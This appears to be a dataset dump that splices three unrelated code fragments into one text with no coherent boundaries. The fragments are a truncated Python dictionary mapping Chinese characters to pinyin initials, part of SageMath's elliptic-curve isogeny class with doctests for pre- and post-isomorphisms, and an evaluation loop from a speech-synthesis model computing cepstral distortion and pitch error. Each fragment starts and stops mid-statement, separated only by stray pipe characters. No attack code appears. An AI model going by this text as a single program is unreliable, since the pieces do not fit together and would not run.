input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
,
u'焦' : [u'q', u'j'] ,
u'閩' : [u'm'] ,
u'䀰' : [u'y', u'g'] ,
u'撳' : [u'q'] ,
u'餶' : [u'g'] ,
u'桀' : [u'j'] ,
u'賃' : [u'r', u'l'] ,
u'寍' : [u'n'] ,
u'铓' : [u'm'] ,
u'佚' : [u'y', u'd'] ,
u'揝' : [u'z'] ,
u'顠' : [u'p'] ,
u'坪' : [u'p'] ,
u'语' : [u'y'] ,
u'嫷' : [u't'] ,
u'罺' : [u'c'] ,
u'鏽' : [u'x'] ,
u'亄' : [u'y'] ,
u'砋' : [u'z'] ,
u'螊' : [u'x', u'l'] ,
u'㜕' : [u'l'] ,
u'嚔' : [u't'] ,
u'耛' : [u'c'] ,
u'弥' : [u'm'] ,
u'纤' : [u'q', u'x', u'j'] ,
u'䶮' : [u'y'] ,
u'朵' : [u'd'] ,
u'蚴' : [u'y', u'n'] ,
u'㘿' : [u'n'] ,
u'喾' : [u'k'] ,
u'轅' : [u'y'] ,
u'幏' : [u'j'] ,
u'緎' : [u'y'] ,
u'靕' : [u'z'] ,
u'䳘' : [u'e'] ,
u'晟' : [u's', u'j', u'c'] ,
u'藞' : [u'l'] ,
u'㕩' : [u'z'] ,
u'哨' : [u's'] ,
u'蹯' : [u'f'] ,
u'嵹' : [u'q', u'j'] ,
u'糸' : [u's', u'm'] ,
u'陿' : [u'x', u's'] ,
u'蔈' : [u'p', u'b'] ,
u'䘊' : [u'm'] ,
u'窍' : [u'q'] ,
u'㾏' : [u'j'] ,
u'渚' : [u'z'] ,
u'芝' : [u'z'] ,
u'䞟' : [u'p'] ,
u'瘪' : [u'p', u'b'] ,
u'䬬' : [u'y'] ,
u'澯' : [u'c'] ,
u'鸺' : [u'x'] ,
u'匼' : [u'q', u'a', u'k'] ,
u'瞿' : [u'q', u'j'] ,
u'䣁' : [u'y'] ,
u'筌' : [u'q'] ,
u'僑' : [u'q'] ,
u'荜' : [u'b'] ,
u'䑞' : [u's'] ,
u'磡' : [u'k'] ,
u'汮' : [u'j'] ,
u'胱' : [u'g'] ,
u'瑾' : [u'j'] ,
u'指' : [u'z'] ,
u'鲎' : [u'h'] ,
u'冐' : [u'm'] ,
u'謗' : [u'b'] ,
u'䰙' : [u'y'] ,
u'禠' : [u's'] ,
u'㪢' : [u's'] ,
u'錧' : [u'g'] ,
u'吩' : [u'f'] ,
u'膰' : [u'f'] ,
u'䊲' : [u'c'] ,
u'簹' : [u'd'] ,
u'櫂' : [u'z'] ,
u'葉' : [u'y', u'x', u's'] ,
u'奋' : [u'f'] ,
u'狒' : [u'f'] ,
u'㟔' : [u'h'] ,
u'慛' : [u'c'] ,
u'髢' : [u't', u'd'] ,
u'忤' : [u'w'] ,
u'襫' : [u's'] ,
u'柴' : [u'c', u'z'] ,
u'㣶' : [u'z'] ,
u'酻' : [u'z'] ,
u'剽' : [u'p', u'b'] ,
u'殁' : [u'm', u'w'] ,
u'谄' : [u'c'] ,
u'㪋' : [u'h'] ,
u'弎' : [u's'] ,
u'玑' : [u'j'] ,
u'鐔' : [u'x', u't'] ,
u'䊛' : [u's'] ,
u'朞' : [u'q', u'j'] ,
u'鮡' : [u'z', u't'] ,
u'㘨' : [u'n'] ,
u'檫' : [u'c', u's'] ,
u'輮' : [u'r'] ,
u'常' : [u'c'] ,
u'犻' : [u'b'] ,
u'霾' : [u'm', u'l'] ,
u'晈' : [u'j'] ,
u'髋' : [u'k'] ,
u'嗕' : [u'r'] ,
u'蹘' : [u'l'] ,
u'奢' : [u's'] ,
u'緥' : [u'b'] ,
u'陨' : [u'y'] ,
u'䳯' : [u'c'] ,
u'慲' : [u'm'] ,
u'哿' : [u'k', u'g'] ,
u'渃' : [u'r'] ,
u'覂' : [u'f'] ,
u'㤍' : [u'q'] ,
u'墌' : [u'z'] ,
u'瘓' : [u'h'] ,
u'醒' : [u'x', u'c', u'j'] ,
u'䄝' : [u'c'] ,
u'悜' : [u'c'] ,
u'鸣' : [u'm'] ,
u'椭' : [u't'] ,
u'袬' : [u'g'] ,
u'㠷' : [u'g'] ,
u'家' : [u'j', u'g'] ,
u'邼' : [u'k'] ,
u'䁇' : [u'm'] ,
u'揆' : [u'k'] ,
u'饍' : [u's'] ,
u'桗' : [u'd'] ,
u'诖' : [u'g'] ,
u'㭡' : [u'x'] ,
u'嫠' : [u'l'] ,
u'灧' : [u'y'] ,
u'鏦' : [u'c'] ,
u'䍱' : [u'x'] ,
u'拰' : [u'n'] ,
u'顷' : [u'q', u'k'] ,
u'謀' : [u'm'] ,
u'䠂' : [u'c'] ,
u'沅' : [u'y'] ,
u'錐' : [u'z'] ,
u'倒' : [u'd'] ,
u'璕' : [u'x'] ,
u'䦗' : [u'x'] ,
u'砢' : [u'k', u'l'] ,
u'鲥' : [u's'] ,
u'耲' : [u'h'] ,
u'䔴' : [u'c'] ,
u'禷' : [u'l'] ,
u'㺹' : [u'b'] ,
u'浄' : [u'j'] ,
u'臇' : [u'j'] ,
u'䛉' : [u'm'] ,
u'畔' : [u'p'] ,
u'滙' : [u'h'] ,
u'剦' : [u'y'] ,
u'盩' : [u'c', u'z'] ,
u'䯫' : [u'h', u's'] ,
u'究' : [u'j'] ,
u'黹' : [u'x', u'z'] ,
u'㽸' : [u'c'] ,
u'叻' : [u'l'] ,
u'芆' : [u'c'] ,
u'䞈' : [u'g'] ,
u'紏' : [u't'] ,
u'澘' : [u's'] ,
u'蔟' : [u'c'] ,
u'娡' : [u'z'] ,
u'瞨' : [u'p'] ,
u'戱' : [u'x', u'h'] ,
u'岺' : [u'l'] ,
u'詁' : [u'g'] ,
u'佃' : [u'd', u't'] ,
u'擊' : [u'x', u'j'] ,
u'㧌' : [u'm'] ,
u'鉑' : [u'b'] ,
u'坓' : [u'x'] ,
u'賚' : [u'l'] ,
u'䇜' : [u'l'] ,
u'罣' : [u'g'] ,
u'㱥' : [u'l'] ,
u'铪' : [u'h', u'k', u'j'] ,
u'槬' : [u'h'] ,
u'蝳' : [u'd'] ,
u'䑵' : [u'm'] ,
u'燼' : [u'j'] ,
u'㛾' : [u'x'] ,
u'䔆' : [u'l'] ,
u'憉' : [u'p'] ,
u'鸌' : [u'h'] ,
u'洖' : [u'w'] ,
u'覙' : [u'l'] ,
u'㰠' : [u'k'] ,
u'墣' : [u'p'] ,
u'甦' : [u's'] ,
u'醩' : [u'z'] ,
u'悳' : [u'd'] ,
u'鴶' : [u'j'] ,
u'㞽' : [u'x'] ,
u'汀' : [u't', u'd'] ,
u'忍' : [u'r'] ,
u'瑐' : [u'j'] ,
u'郓' : [u'y'] ,
u'䭚' : [u'c', u'n'] ,
u'柝' : [u't'] ,
u'鱠' : [u'k'] ,
u'㛧' : [u'm'] ,
u'卪' : [u'j'] ,
u'迭' : [u'd'] ,
u'廷' : [u't'] ,
u'韽' : [u'y', u'a'] ,
u'䪄' : [u'h'] ,
u'簋' : [u'g'] ,
u'莊' : [u'z'] ,
u'劔' : [u'j'] ,
u'萛' : [u'j'] ,
u'嬥' : [u't'] ,
u'䦮' : [u'c'] ,
u'挵' : [u'l', u'n'] ,
u'芴' : [u'h', u'w'] ,
u'冾' : [u'x'] ,
u'譅' : [u's'] ,
u'婏' : [u'f'] ,
u'秎' : [u'f'] ,
u'鍕' : [u'r'] ,
u'䣘' : [u't'] ,
u'扟' : [u's'] ,
u'臞' : [u'q'] ,
u'僨' : [u'f'] ,
u'詯' : [u'h'] ,
u'她' : [u't'] ,
u'磸' : [u'd'] ,
u'鉿' : [u'h', u'k', u'j', u'g'] ,
u'脈' : [u'm'] ,
u'䈊' : [u'l'] ,
u'纍' : [u'l'] ,
u'㮏' : [u'n'] ,
u'樚' : [u'l'] ,
u'蚝' : [u'h', u'c'] ,
u'䎟' : [u'e', u'n'] ,
u'爪' : [u'z'] ,
u'殯' : [u'b'] ,
u'騺' : [u'z'] ,
u'圼' : [u'n'] ,
u'玿' : [u's'] ,
u'䳁' : [u'y', u'b'] ,
u'罌' : [u'y'] ,
u'哑' : [u'y', u'e'] ,
u'蝜' : [u'f'] ,
u'䁞' : [u's'] ,
u'糡' : [u'j'] ,
u'㧣' : [u'z'] ,
u'桮' : [u'b'] ,
u'蓱' : [u'p'] ,
u'灾' : [u'z'] ,
u'䶀' : [u't'] ,
u'朇' : [u'p'] ,
u'颎' : [u'j'] ,
u'喐' : [u'y'] ,
u'輗' : [u'n'] ,
u'䠙' : [u'p', u'b'] ,
u'綠' : [u'l'] ,
u'霧' : [u'm', u'w'] ,
u'倩' : [u'q'] ,
u'薰' : [u'x'] ,
u'䚲' : [u's'] ,
u'砹' : [u'a', u'n'] ,
u'滂' : [u'p'] ,
u'聉' : [u'w'] ,
u'嵋' : [u'm'] ,
u'盒' : [u'a', u'h'] ,
u'敛' : [u'l'] ,
u'黢' : [u'q'] ,
u'寤' : [u'w'] ,
u'赫' : [u'h', u's', u'x'] ,
u'乭' : [u's'] ,
u'援' : [u'y'] ,
u'㳶' : [u'g'] ,
u'镻' : [u'd'] ,
u'噽' : [u'p'] ,
u'澁' : [u's'] ,
u'蠄' : [u'q'] ,
u'嬎' : [u'f'] ,
u'瞑' : [u'm'] ,
u'途' : [u't'] ,
u'䚛' : [u'h'] ,
u'挞' : [u't'] ,
u'龡' : [u'c'] ,
u'溫' : [u'w'] ,
u'謮' : [u'z'] ,
u'娸' : [u'q'] ,
u'皻' : [u'z'] ,
u'錾' : [u'z'] ,
u'䧅' : [u'y', u't'] ,
u'扈' : [u'h'] ,
u'黋' : [u'k'] ,
u'㕒' : [u'w'] ,
u'凕' : [u'm'] ,
u'詘' : [u'q', u'c'] ,
u'嵢' : [u'c'] ,
u'秥' : [u'n'] ,
u'鉨' : [u'x', u'n'] ,
u'䣯' : [u't'] ,
u'敲' : [u'q'] ,
u'臵' : [u'g'] ,
u'㑼' : [u'l'] ,
u'僿' : [u's'] ,
u'樃' : [u'l'] ,
u'趂' : [u'c'] ,
u'岌' : [u'j'] ,
u'爓' : [u'y', u'q', u'x'] ,
u'閒' : [u'x', u'j'] ,
u'撜' : [u'c', u'z'] ,
u'騣' : [u'z'] ,
u'㞦' : [u'j'] ,
u'洭' : [u'k'] ,
u'責' : [u'z'] ,
u'㰷' : [u'z'] ,
u'徶' : [u'b'] ,
u'甽' : [u'q', u'z'] ,
u'钼' : [u'm'] ,
u'䑇' : [u'z'] ,
u'柆' : [u'l'] ,
u'鵍' : [u'h'] ,
u'㛐' : [u'x', u's'] ,
u'汗' : [u'h', u'g'] ,
u'迖' : [u'd', u't'] ,
u'廠' : [u'c'] ,
u'瑧' : [u'j'] ,
u'韦' : [u'w'] ,
u'曰' : [u'y'] ,
u'鱷' : [u'e'] ,
u'㧺' : [u't'] ,
u'輀' : [u'e'] ,
u'䰂' : [u'c'] ,
u'梅' : [u'm'] ,
u'霐' : [u'w'] ,
u'吒' : [u'c', u'z'] ,
u'炕' : [u'h', u'k'] ,
u'䶗' : [u'q', u'k'] ,
u'簢' : [u'm'] ,
u'颥' : [u'r'] ,
u'㤤' : [u'y'] ,
u'喧' : [u'x'] ,
u'萲' : [u'y', u'x'] ,
u'綷' : [u'c'] ,
u'㪹' : [u'l'] ,
u'楄' : [u'p'] ,
u'藇' : [u'y', u'x'] ,
u'䋉' : [u'x', u'k', u'j'] ,
u'煔' : [u'q', u's', u't'] ,
u'乖' : [u'g'] ,
u'櫙' : [u'o'] ,
u'饤' : [u'd'] ,
u'噦' : [u'y', u'h'] ,
u'狩' : [u's'] ,
u'俫' : [u'l'] ,
u'繶' : [u'y'] ,
u'髹' : [u'x'] ,
u'㭸' : [u't'] ,
u'埻' : [u'z'] ,
u'蚆' : [u'p'] ,
u'䎈' : [u'y'] ,
u'礏' : [u'j'] ,
u'㘑' : [u'l'] ,
u'殘' : [u'c'] ,
u'脟' : [u'l'] ,
u'帡' : [u'p'] ,
u'玨' : [u'j'] ,
u'昱' : [u'y'] ,
u'鮸' : [u'm'] ,
u'墺' : [u'a', u'y'] ,
u'蹁' : [u'p'] ,
u'䭃' : [u'r'] ,
u'惊' : [u'j', u'l'] ,
u'陑' : [u'e'] ,
u'卓' : [u'z'] ,
u'裚' : [u'j'] ,
u'䗜' : [u'l'] ,
u'筣' : [u'l'] ,
u'㡥' : [u'y'] ,
u'郪' : [u'q', u'c'] ,
u'淬' : [u'c', u'z'] ,
u'荳' : [u'd'] ,
u'䁵' : [u'b'] ,
u'痼' : [u'g'] ,
u'㒃' : [u'e'] ,
u'夆' : [u'p', u'f'] ,
u'綉' : [u'x', u't'] ,
u'舌' : [u's', u'g'] ,
u'焖' : [u'm'] ,
u'閙' : [u'n'] ,
u'䒣' : [u'r'] | |
0)
"""
from sage.misc.superseded import deprecation
deprecation(32388, 'Elliptic-curve isogenies will be immutable in a future release of Sage.'
' Use phi*psi instead of phi.set_pre_isomorphism(psi) to obtain the composite isogeny.')
return self._set_pre_isomorphism(preWI)
def _set_pre_isomorphism(self, preWI):
"""
Modify this isogeny by pre-composing with a
:class:`sage.schemes.elliptic_curves.weierstrass_morphism.WeierstrassIsomorphism`.
For internal use only.
TESTS:
These tests were copied from :meth:`set_pre_isomorphism`::
sage: E = EllipticCurve(GF(31), [1,1,0,1,-1])
sage: R.<x> = GF(31)[]
sage: f = x^3 + 9*x^2 + x + 30
sage: phi = EllipticCurveIsogeny(E, f)
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi.rational_maps()
((-6*x^4 - 3*x^3 + 12*x^2 + 10*x - 1)/(x^3 + x - 12), (3*x^7 + x^6*y - 14*x^6 - 3*x^5 + 5*x^4*y + 7*x^4 + 8*x^3*y - 8*x^3 - 5*x^2*y + 5*x^2 - 14*x*y + 14*x - 6*y - 6)/(x^6 + 2*x^4 + 7*x^3 + x^2 + 7*x - 11))
sage: phi(Epr((0,22)))
(13 : 21 : 1)
sage: phi(Epr((3,7)))
(14 : 17 : 1)
sage: E = EllipticCurve(GF(29), [0,0,0,1,0])
sage: R.<x> = GF(29)[]
sage: f = x^2 + 5
sage: phi = EllipticCurveIsogeny(E, f)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 = x^3 + x over Finite Field of size 29 to Elliptic Curve defined by y^2 = x^3 + 20*x over Finite Field of size 29
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: inv_isom = WeierstrassIsomorphism(E, (1,-2,5,10))
sage: Epr = inv_isom.codomain()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 + 10*x*y + 20*y = x^3 + 27*x^2 + 6 over Finite Field of size 29 to Elliptic Curve defined by y^2 = x^3 + 20*x over Finite Field of size 29
sage: phi(Epr((12,1)))
(26 : 0 : 1)
sage: phi(Epr((2,9)))
(0 : 0 : 1)
sage: phi(Epr((21,12)))
(3 : 0 : 1)
sage: phi.rational_maps()[0]
(x^5 - 10*x^4 - 6*x^3 - 7*x^2 - x + 3)/(x^4 - 8*x^3 + 5*x^2 - 14*x - 6)
sage: E = EllipticCurve('11a1')
sage: R.<x> = QQ[]
sage: f = x^2 - 21*x + 80
sage: phi = EllipticCurveIsogeny(E, f); phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 + y = x^3 - x^2 - 10*x - 20 over Rational Field to Elliptic Curve defined by y^2 + y = x^3 - x^2 - 7820*x - 263580 over Rational Field
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi._set_pre_isomorphism(isom)
sage: phi
Isogeny of degree 5 from Elliptic Curve defined by y^2 = x^3 - 13392*x - 1080432 over Rational Field to Elliptic Curve defined by y^2 + y = x^3 - x^2 - 7820*x - 263580 over Rational Field
sage: phi(Epr((168,1188)))
(0 : 1 : 0)
"""
WIdom = preWI.domain()
WIcod = preWI.codomain()
if not isinstance(preWI, WeierstrassIsomorphism):
raise ValueError("Invalid parameter: isomorphism must be of type Weierstrass isomorphism.")
if (self.__E1 != WIcod):
raise ValueError("Invalid parameter: isomorphism must have codomain curve equal to this isogenies' domain.")
if (self.__pre_isomorphism is None):
isom = preWI
domain = WIdom
else:
isom = self.__pre_isomorphism*preWI
domain = WIdom
self.__clear_cached_values()
self.__set_pre_isomorphism(domain, isom)
return
def set_post_isomorphism(self, postWI):
r"""
Modify this isogeny by postcomposing with a Weierstrass isomorphism.
.. WARNING::
Isogenies will be immutable in a future release of Sage.
This method is deprecated in favor of using the ``*`` operator
to compose elliptic-curve morphisms.
EXAMPLES::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: phi.set_post_isomorphism(WeierstrassIsomorphism(phi.codomain(), (6,8,10,12)))
...
sage: phi
Isogeny of degree 3 from Elliptic Curve defined by y^2 = x^3 + 1 over Finite Field of size 31 to Elliptic Curve defined by y^2 + 24*x*y + 7*y = x^3 + 22*x^2 + 16*x + 20 over Finite Field of size 31
sage: E = EllipticCurve(j=GF(47)(0))
sage: f = E.torsion_polynomial(3)/3
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: post_isom = E2.isomorphism_to(E)
sage: phi.set_post_isomorphism(post_isom)
...
sage: phi.rational_maps() == E.multiplication_by_m(3)
False
sage: phi.switch_sign()
...
sage: phi.rational_maps() == E.multiplication_by_m(3)
True
Example over a number field::
sage: R.<x> = QQ[]
sage: K.<a> = NumberField(x^2 + 2)
sage: E = EllipticCurve(j=K(1728))
sage: ker_list = E.torsion_points()
sage: phi = EllipticCurveIsogeny(E, ker_list)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: post_isom = WeierstrassIsomorphism(phi.codomain(), (a,2,3,5))
sage: phi
Isogeny of degree 4 from Elliptic Curve defined by y^2 = x^3 + x over Number Field in a with defining polynomial x^2 + 2 to Elliptic Curve defined by y^2 = x^3 + (-44)*x + 112 over Number Field in a with defining polynomial x^2 + 2
"""
from sage.misc.superseded import deprecation
deprecation(32388, 'Elliptic-curve isogenies will be immutable in a future release of Sage.'
' Use psi*phi instead of phi.set_post_isomorphism(psi) to obtain the composite isogeny.')
return self._set_post_isomorphism(postWI)
def _set_post_isomorphism(self, postWI):
"""
Modify this isogeny by post-composing with a
:class:`sage.schemes.elliptic_curves.weierstrass_morphism.WeierstrassIsomorphism`.
For internal use only.
TESTS:
These tests were copied from :meth:`set_post_isomorphism`::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: phi._set_post_isomorphism(WeierstrassIsomorphism(phi.codomain(), (6,8,10,12)))
sage: phi
Isogeny of degree 3 from Elliptic Curve defined by y^2 = x^3 + 1 over Finite Field of size 31 to Elliptic Curve defined by y^2 + 24*x*y + 7*y = x^3 + 22*x^2 + 16*x + 20 over Finite Field of size 31
sage: E = EllipticCurve(j=GF(47)(0))
sage: f = E.torsion_polynomial(3)/3
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: post_isom = E2.isomorphism_to(E)
sage: phi._set_post_isomorphism(post_isom)
sage: phi.rational_maps() == E.multiplication_by_m(3)
False
sage: phi = -phi
sage: phi.rational_maps() == E.multiplication_by_m(3)
True
sage: R.<x> = QQ[]
sage: K.<a> = NumberField(x^2 + 2)
sage: E = EllipticCurve(j=K(1728))
sage: ker_list = E.torsion_points()
sage: phi = EllipticCurveIsogeny(E, ker_list)
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: post_isom = WeierstrassIsomorphism(phi.codomain(), (a,2,3,5))
sage: phi
Isogeny of degree 4 from Elliptic Curve defined by y^2 = x^3 + x over Number Field in a with defining polynomial x^2 + 2 to Elliptic Curve defined by y^2 = x^3 + (-44)*x + 112 over Number Field in a with defining polynomial x^2 + 2
"""
WIdom = postWI.domain()
WIcod = postWI.codomain()
if not isinstance(postWI, WeierstrassIsomorphism):
raise ValueError("Invalid parameter: isomorphism must be of type Weierstrass isomorphism.")
if (self.__E2 != WIdom):
raise ValueError("Invalid parameter: isomorphism must have domain curve equal to this isogenies' codomain.")
if (self.__post_isomorphism is None):
isom = postWI
codomain = WIcod
else:
isom = postWI*self.__post_isomorphism
codomain = WIcod
self.__clear_cached_values()
self.__set_post_isomorphism(codomain, isom)
return
def get_pre_isomorphism(self):
r"""
Return the pre-isomorphism of this isogeny, or ``None``.
EXAMPLES::
sage: E = EllipticCurve(GF(31), [1,1,0,1,-1])
sage: R.<x> = GF(31)[]
sage: f = x^3 + 9*x^2 + x + 30
sage: phi = EllipticCurveIsogeny(E, f)
sage: phi.get_post_isomorphism()
sage: Epr = E.short_weierstrass_model()
sage: isom = Epr.isomorphism_to(E)
sage: phi.set_pre_isomorphism(isom)
...
sage: isom == phi.get_pre_isomorphism()
True
sage: E = EllipticCurve(GF(83), [1,0,1,1,0])
sage: R.<x> = GF(83)[]; f = x+24
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: phi2 = EllipticCurveIsogeny(E, None, E2, 2)
sage: phi2.get_pre_isomorphism()
Elliptic-curve morphism:
From: Elliptic Curve defined by y^2 + x*y + y = x^3 + x over Finite Field of size 83
To: Elliptic Curve defined by y^2 = x^3 + 62*x + 74 over Finite Field of size 83
Via: (u,r,s,t) = (1, 76, 41, 3)
"""
return self.__pre_isomorphism
def get_post_isomorphism(self):
r"""
Return the post-isomorphism of this isogeny, or ``None``.
EXAMPLES::
sage: E = EllipticCurve(j=GF(31)(0))
sage: R.<x> = GF(31)[]
sage: phi = EllipticCurveIsogeny(E, x+18)
sage: phi.get_post_isomorphism()
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism
sage: isom = WeierstrassIsomorphism(phi.codomain(), (6,8,10,12))
sage: phi.set_post_isomorphism(isom)
...
sage: isom == phi.get_post_isomorphism()
True
sage: E = EllipticCurve(GF(83), [1,0,1,1,0])
sage: R.<x> = GF(83)[]; f = x+24
sage: phi = EllipticCurveIsogeny(E, f)
sage: E2 = phi.codomain()
sage: phi2 = EllipticCurveIsogeny(E, None, E2, 2)
sage: phi2.get_post_isomorphism()
Elliptic-curve morphism:
From: Elliptic Curve defined by y^2 = x^3 + 65*x + 69 over Finite Field of size 83
To: Elliptic Curve defined by y^2 + x*y + y = x^3 + 4*x + | |
for ph_s in ph_b]
#print('len(curr_ph_b): ', len(curr_ph_b))
#print('len(curr_ph_b[0]): ', len(curr_ph_b[0]))
# convert all into variables and transpose (we want time-major)
# TODO: write temporally lab_b adn aco_b to compare to synth
# batches for aco objective eval mismatch
aco_b_npy = aco_b.data.numpy()
lab_b_npy = lab_b.data.numpy()
#np.save('eval_aco_{}.npy'.format(b_idx),
# aco_b_npy)
#np.save('eval_lab_{}.npy'.format(b_idx),
# lab_b_npy)
spk_b = spk_b.transpose(0,1)
spk_name = idx2spk[spk_b.cpu().data[0,0].item()]
lab_b = lab_b.transpose(0,1)
aco_b = aco_b.transpose(0,1)
# get curr batch size
curr_bsz = spk_b.size(1)
# TODO: atm it is NOT stateful
if spk_name not in spk2hid_states:
hid_state = model.init_hidden_state(curr_bsz)
out_state = model.init_output_state(curr_bsz)
spk2hid_states[spk_name] = hid_state
spk2out_states[spk_name] = out_state
#print('Initializing states of spk ', spk_name)
else:
#print('Fetching mulout states of spk ', spk_name)
# select last spks state in the MO dict
hid_state = spk2hid_states[spk_name]
out_state = spk2out_states[spk_name]
hid_state = repackage_hidden(hid_state, curr_bsz)
out_state = repackage_hidden(out_state, curr_bsz)
if cuda:
spk_b = var_to_cuda(spk_b)
lab_b = var_to_cuda(lab_b)
aco_b = var_to_cuda(aco_b)
slen_b = var_to_cuda(slen_b)
hid_state = var_to_cuda(hid_state)
out_state = var_to_cuda(out_state)
# forward through model
y, hid_state, out_state = model(lab_b, hid_state,
out_state,
speaker_idx=spk_b)
spk_npy = spk_b.cpu().data.numpy()
#print(spk_npy)
all_comp = np.all(spk_npy == spk_npy[0, 0]), spk_npy
assert all_comp
if isinstance(y, dict):
# we have a MO model, pick the right spk
# print('Extracting y prediction for MO spk ', spk_name)
y = y[spk_name]
# save its states
spk2hid_states[spk_name] = hid_state
spk2out_states[spk_name] = out_state
if reset_batch_state:
# reset RNN states after predicting a batch
del spk2hid_states[spk_name]
del spk2out_states[spk_name]
#print('y size: ', y.size())
#print('aco_b size: ', aco_b.size())
#print('len(curr_ph_b)= ', len(curr_ph_b))
preds, gtruths, \
spks, sil_mask = predict_masked_mcd(y, aco_b, slen_b,
spk_b, curr_ph_b,
preds, gtruths,
spks, sil_mask,
sil_id)
print('After batch preds shape: ', preds.shape)
print('After batch gtruths shape: ', gtruths.shape)
print('After batch sil_mask shape: ', sil_mask.shape)
print('After batch spks shape: ', spks.shape)
print('Sil mask mean: ', sil_mask.mean())
# denorm with normalization stats
assert spk2acostats is not None
preds, gtruths = denorm_aco_preds_gtruth(preds, gtruths,
spks, spk2acostats)
aco_mcd = mcd(preds[:,:40], gtruths[:,:40], spks, idx2spk)
print('U/V preds min: ', preds[:, -1].min())
print('U/V preds max: ', preds[:, -1].max())
print('U/V preds mean: ', preds[:, -1].mean())
print('U/V gtruth min: ', gtruths[:, -1].min())
print('U/V gtruth max: ', gtruths[:, -1].max())
print('U/V gtruth mean: ', gtruths[:, -1].mean())
#print('preds shape: ', preds.shape)
#print('gtruths shape: ', gtruths.shape)
aco_afpr = afpr(np.round(preds[:,-1]).reshape(-1, 1),
gtruths[:,-1].reshape(-1, 1), spks,
idx2spk)
aco_f0_rmse, aco_f0_spk = rmse(np.exp(preds[:, -2]),
np.exp(gtruths[:, -2]),
spks, idx2spk)
#print('Evaluated aco F0 mRMSE [Hz]: {:.2f}'.format(aco_f0_rmse))
masked_f0_preds = np.exp(preds[:, -2]).reshape(-1, 1) * sil_mask
masked_f0_gtruths = np.exp(gtruths[:, -2]).reshape(-1, 1) * sil_mask
write_histogram_log(np.exp(preds[:, -2]),
'F0 predictions',
epoch_idx, log_writer)
write_histogram_log(np.exp(gtruths[:, -2]),
'F0 groundtruth',
epoch_idx, log_writer)
nosil_aco_f0_rmse, \
nosil_aco_f0_spk = rmse(masked_f0_preds,
masked_f0_gtruths,
spks, idx2spk)
write_histogram_log(preds[:, :40],
'MFCC predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, :40],
'MFCC groundtruth',
epoch_idx, log_writer)
masked_cc_preds = preds[:, :40] * sil_mask
masked_cc_gtruths = gtruths[:, :40] * sil_mask
nosil_aco_mcd = mcd(masked_cc_preds, masked_cc_gtruths,
spks, idx2spk)
write_histogram_log(preds[:, -1],
'U/V predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, -1],
'U/V groundtruth',
epoch_idx, log_writer)
masked_uv_preds = np.round(preds[:, -1]).reshape(-1, 1) * sil_mask
masked_uv_gtruths = gtruths[:, -1].reshape(-1, 1) * sil_mask
write_histogram_log(preds[:, -3],
'FV predictions',
epoch_idx, log_writer)
write_histogram_log(gtruths[:, -3],
'FV groundtruth',
epoch_idx, log_writer)
#print('masked_uv_preds shape: ', masked_uv_preds.shape)
#print('masked_uv_gtruths shape: ', masked_uv_gtruths.shape)
nosil_aco_afpr = afpr(masked_uv_preds, masked_uv_gtruths,
spks, idx2spk)
#print('Evaluated aco MCD [dB]: {:.3f}'.format(aco_mcd['total']))
print('========= F0 RMSE =========')
print('Evaluated aco W/O sil phones ({}) F0 mRMSE [Hz]:'
'{:.2f}'.format(sil_id, nosil_aco_f0_rmse))
write_scalar_log(nosil_aco_f0_rmse,
'total_no-silence_F0_rmse_Hz',
epoch_idx, log_writer)
print('Evaluated aco F0 mRMSE of spks: '
'{}'.format(json.dumps(nosil_aco_f0_spk,
indent=2)))
if len(nosil_aco_f0_spk) > 1:
for k, v in nosil_aco_f0_spk.items():
write_scalar_log(v, '{}_no-silence_F0_rmse_Hz'.format(k),
epoch_idx, log_writer)
print('========= MCD =========')
print('Evaluated aco W/O sil phones ({}) MCD [dB]:'
'{:.3f}'.format(sil_id, nosil_aco_mcd['total']))
write_scalar_log(nosil_aco_mcd['total'],
'total_MCD_dB',
epoch_idx, log_writer)
#print('Evaluated w/ sil MCD of spks: {}'.format(json.dumps(aco_mcd,
# indent=2)))
print('Evaluated W/O sil MCD of spks: {}'.format(json.dumps(nosil_aco_mcd,
indent=2)))
if len(nosil_aco_mcd) > 2:
# will print all speakers
for k, v in nosil_aco_mcd.items():
if k == 'total':
continue
write_scalar_log(v,
'MCD_spk{}_dB'.format(k),
epoch_idx, log_writer)
print('========= Acc =========')
#print('Evaluated aco AFPR [norm]: '.format(aco_afpr['A.total']))
print('Evaluated W/O sil phones ({}) Acc [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['A.total']))
write_scalar_log(nosil_aco_afpr['A.total'], 'Total Accuracy',
epoch_idx, log_writer)
print('Evaluated W/O sil phones ({}) P [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['P.total']))
write_scalar_log(nosil_aco_afpr['P.total'], 'Total Precision',
epoch_idx, log_writer)
print('Evaluated W/O sil phones ({}) R [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['R.total']))
write_scalar_log(nosil_aco_afpr['R.total'], 'Total Recall',
epoch_idx, log_writer)
